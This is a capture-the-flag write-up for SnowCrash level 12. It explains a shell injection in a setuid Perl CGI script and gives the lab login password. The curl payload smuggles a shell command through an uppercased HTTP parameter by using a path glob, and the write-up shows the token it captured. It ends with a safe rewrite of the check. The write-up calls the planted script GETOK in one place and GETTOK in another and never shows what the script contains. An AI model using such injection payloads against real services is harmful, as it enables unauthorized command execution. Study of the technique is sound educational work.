snowcrash/levels/12
2026-01-19 19:56:37 +01:00

Level 12

how to log in

username: level12

password: fa6v5ateaw21peobuub8ipe6s

Goal

run getflag as user flag12

Actually doing something

level12@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level12 level12  120 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level12 level12  220 Apr  3  2012 .bash_logout*
-r-x------  1 level12 level12 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x+ 1 flag12  level12  464 Mar  5  2016 level12.pl*
-r-x------  1 level12 level12  675 Apr  3  2012 .profile*

Perl again...

level12@SnowCrash:~$ cat level12.pl 
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/; 
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }    
}

n(t(param("x"), param("y")));

a bit more involved, let's try to make it prettier

#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $arg2 = $_[1];
  $arg1 = $_[0];
  $arg1 =~ tr/a-z/A-Z/; 
  $arg1 =~ s/\s.*//;
  @output = `egrep "^$arg1" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $arg2) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));

when looking at this, we spot an egrep run through backticks, meaning that we have a shell injection.

let's look at what is given to this string

first of all, the function gets called with two arguments; let's call them by their HTTP parameter names x and y

in the prettified version they are named arg1 for x and arg2 for y

arg2 doesn't matter for us, so let's ignore it

arg1 is converted to uppercase, and then only everything up to the first whitespace character is kept;

so we want to do something like last time, meaning that we want to insert something that ends the current command, like ";cmdhere

but the issue is that the command has to be in uppercase (because everything gets converted to uppercase), while the only directory we can write to is /tmp, which is in lowercase...

luckily this doesn't matter since we are in shell land, and we can write /*/GETOK, which the shell glob expands to the /tmp/GETOK script

level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag
..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
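As an added example, not the level's own script, here is the check from level12.pl rewritten so that x and y never reach a shell: the file is read in Perl and, if an external egrep is really wanted, it is spawned with the list form of open. The sample data, the function names and the egrep_lines helper are my assumptions.

```perl
#!/usr/bin/env perl
# Added example, not the level's script: the same check as level12.pl, but
# the user-controlled value never reaches /bin/sh. Path and names are assumed.
use strict;
use warnings;

my $DB = '/tmp/xd';   # the original hard-codes this path

sub t_safe {
    my ($x, $y) = @_;
    return 0 unless defined $x && defined $y;
    $x =~ tr/a-z/A-Z/;      # same transforms as the original...
    $x =~ s/\s.*//s;        # ...with /s so a newline also ends the value

    open(my $fh, '<', $DB) or return 0;     # unreadable file: no match
    while (my $line = <$fh>) {
        chomp $line;
        # prefix test in Perl: what egrep "^$x" did, minus the shell
        next unless index($line, $x) == 0;
        my ($f, $s) = split(/:/, $line, 2);
        next unless defined $s;
        # y compared literally (\Q..\E); the original used it as a regex
        return 1 if $s =~ /\Q$y\E/;
    }
    close $fh;
    return 0;
}

# If an external egrep is really wanted, the list form of open forks and
# execs it directly: ";", "/*" and quotes arrive as plain bytes, not shell.
sub egrep_lines {
    my ($pattern, $file) = @_;
    open(my $fh, '-|', 'egrep', '--', $pattern, $file) or return ();
    my @lines = <$fh>;
    close $fh;
    return @lines;
}

if (!caller) {
    require File::Temp;
    my $tmp = File::Temp->new();
    print $tmp "ALICE:s3cret\nBOB:hunter2\n";   # constructed sample data
    $tmp->flush;
    $DB = $tmp->filename;
    my $ok  = t_safe('alice extra words', 's3cret');   # 1 -> prints ".."
    my $bad = t_safe('";/*/GETTOK;"', 'anything');     # 0 -> prints "."
    print(($ok  ? ".." : ".") . "\n");
    print(($bad ? ".." : ".") . "\n");
}
```

Running it prints ".." for the legitimate lookup and "." for the payload from the writeup, because the payload is now just a string that no line in the file starts with.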